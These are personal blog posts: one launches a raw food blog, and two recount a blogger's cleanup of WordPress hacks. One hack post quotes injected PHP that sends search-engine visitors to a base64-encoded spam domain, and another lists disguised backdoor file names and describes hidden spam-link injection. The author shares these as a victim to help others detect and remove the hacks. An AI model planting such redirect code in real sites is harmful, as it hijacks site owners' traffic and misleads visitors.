Tiffany Washko

Just a few days ago I went live with a brand new web site/blog. It is a raw food blog called Goddess of the Garden. On this blog I will be discussing one my my fave topics…the raw foods, living foods, sunfoods, movement. It will have my experiences, my favorite foods, pictures, informational articles, and reviews of books and kitchen gadgets. So if this topic interests you be sure to stop by and subscribe to the RSS feed.

It is actually kind of interesting how I came to own the domain. Several years ago when I owned a cloth diaper company and store there was a really awesome “club” called Goddess of the Garden. Basically WAHMs joined and donated some of their wares every month. The donations were pooled together and offered as prizes to those who purchased a Goddess membership. Their membership which cost $5 a month entitled them to 10% off at all the wahm stores and they were entered to win the prizes. Each time they shopped and use their membership code they were entered again. The membership dues were then taken and used to buy advertising for all the WAHMs in the group.

It was really an awesome program and brought a lot of business my way. I always LOVED the name Goddess of the Garden and I loved the graphics that we had made for it using the advertising money. The woman growing out of the grass just appealed to me. Anyway…long story short the domain holder up and sold the site one day and really made the WAHMs who had helped build it to what it was very angry. The site went to someone who wanted to continue on in the same vein but everyone involved was so upset they walked away and the site just died. The site made a brief transition into a blog/forum…but it didn’t go anywhere so there it sat alone and lonely for a couple years.

When I became interested in raw foods about 6 months or so ago I knew I should start a raw food blog. That niche is exploding right now and will continue to do so. But what should my domain be? I briefly set up a blog on my naturemoms.com domain but I just didn’t “feel” it, ya know? Then I remembered the Goddess of the Garden. Woot! The raw foods diet is often referred to to as the garden diet because it primarily consists of food you pick fresh from a garden. It was PERFECT!

So I contacted the owner and asked if she would sell it to me. The price was pretty steep for a site which had virtually nothing on it but I knew what the graphics had cost to have hand drawn so after one counter offer we had a deal. Now the Goddess is mine and I am having a blast with it so far.

Share This

If you're new here, you may want to subscribe to my RSS feed. Thanks for visiting!

I have had a rough month being a WAHM this month. If you recall my blog was hacked and my search engine traffic was being redirected to a spammer site. I thought that was the end of it….but the saga continues. I have several blogs and of course they targeted my main blog (not this one)…my bread and butter blog so to speak. After I got rid of the anyresults.net hack I thought I was in the clear but I wasn’t.

A few days later a fellow blogger emailed me to let me know that his own blog had been hacked and spam was being injected into his blog invisibly. You could even look at the source code and not see a darn thing. He found the links by analyzing his blog with CURL and the links all went to my site…aka buy your viagra here and then a link to my blog…only there were 30+ plus links for all sorts of spammy products and drugs. Of course he went to my blog to see if I was the spammer who hacked his blog and of course found nothing..until he looked at my blog with CURL and saw I was hacked too. He was nice enough to email me and let me know.

I hoped he was wrong but since I didn’t know how to use CURL I couldn’t verify. Then I did two things to test. I went to Google’s Webmaster Tools and looked at the keywords they had indexed for my site and sprinkled throughout were the spammy keywords. Then I searched for “viagra and my URL” and TONS of links had been indexed. I was dangerously close to getting banned by Google for being a spammer and in fact I have met several people during this fiasco that didn’t catch this hack until they did get banned.

Also, via a tip to use CRON from a Mom Masterminds member (LOVE that group) I ran a CURL string:

curl –user-agent Googlebot + URL

This verified in a way easy for me to see, where the links where. I was still shocked when I saw them for the first time though. They all pointed back to my own site. The overall goal of this hack is get you banned from search engines…perhaps so the spammers can rank better for the SERPS you currently hold. They are knocking out the competition. Oh and they added new Adsense info at the bottom of the page, maybe even siphoning my Adsense commissions.

So…..the blogger who emailed me also gave me a link that helped resolve the hack. There is a lot of info there but only some of it applied to my situation. For instance some of these hacks involve code directly implanted into your theme files but my situation was a little different. My hack was disguised as a plugin and not one that you could see in the wordpress dashboard. Sprinkled all throughout my files I found what looked like image files or regular php files:

filenames “*_new.php” , “*_old.php”,. “*.jpgg”, “*_giff”

They were all coded hack files and there was over a dozen of them…back doors to keep open so the spammers could keep accessing my site. They would make a plugin run under the radar that would inject the spam links. I had to check wp_options in my database and see what was listed under active plugins…I found the culprit there, deleted the code and deleted what I thought was all the files. I also deleted all my users and there were a few suspicious ones there and I scrubbed the database. Case closed.

Or so I thought. A couple days ago I checked Webmaster tools again just for the heck of it and guess what…the hack was back. So I just cleaned it up AGAIN…and did an even more thorough search. I only found one file that I think I missed the first time but one is all it takes. Now I have CRON being run to check for spam injection links every hour on the hour and the results are emailed to me. It is a pain but I am not going to let this go unchecked again. Just today I think Google cleared out the last of the badly indexed files although some phantom keywords still show in Webmaster tools…I hope they go away soon.

Soemtimes it is not so fun to be a blogger and Internet Marketer…especially when you are being sabotaged.

Share This

My biggest blog was hacked recently. I “should” have caught on to it much more quickly but I didn’t. When traffic dropped by about 1000 people a day and my income majorly plummeted I started to take notice but I was at a loss as to how to explain it. I did see a serious lack of Google traffic so I thought maybe I got slapped for some reason. I don’t utilize any blackhat SEO methods but my content has been getting ripped off and republished left and right lately. My SERPs remained the same though, so I was VERY confused.

Then a blog reader mentioned to me that when she clicked on a link to my blog in the Google reader she would be redirected to a site called anyresults.net. She even researched it a bit and sent me a link to a discussion about this very issue. It is a hack affecting thousands of Wordpress blogs. Basically it steals all of your search engine traffic…via AOL, Google, Yahoo, MSN, you name it. If a search result brings up a link to your site the visitor would be redirected to anyresults.net and not your site. I erased my cookies and tried it myself and sure enough I was redirected every time. I could even search for my blog by name and be redirected. By now I was FURIOUS. I lost some major moola this week because some jerk-off stole traffic that should have been mine…Adsense, affiliate income, ad networks…all were suffering.

After I started looking for solutions I also found some people saying that Google ended up banning them for redirecting to a spam site! They got hacked and then slapped…talk about and insult after injury.

To get rid of the hack I tried the “solution” found here. It was useless. Mostly this thread seems full of people who assume you were to stupid to upgrade and that is why you got hacked. I was hacked while running the latest version, 2.5.1, so there goes that theory. I looked in my MySQL database for image being used as a plugin and there wasn’t one. I also deleted this string: rss_f541b3abd05e7962fcab37737f40fad8. It did nothing. I even deactivated all plugins and the problem was still there so clearly it is NOT a plugin issue.

Just like this blogger I did find this code in my wp-blog-header.php file:

 ?php \
$seref=array(”google”,”msn”,”live”,”altavista”,”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser=”1″; break; }
if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit; }?>

This is NOT supposed to be there. I deleted it but this in itself did not fix the issue. So I copied over all the files in the main WP directory with fresh, clean files and the problem was fixed. I wish I had known about this before I scoured my database and reinstalled a clean version of each plugin. Hope it helps some others affected by this attack.

While I was working this out I also added a blank index file to my plugins folder so people can’t see what plugins I am using and to find back doors. I also deleted all of my users and checked my permission settings. Hopefully my traffic will get back to normal and I can avoid further attacks…what a major pain in the neck.

Now I need to check out all my other blogs.

Share This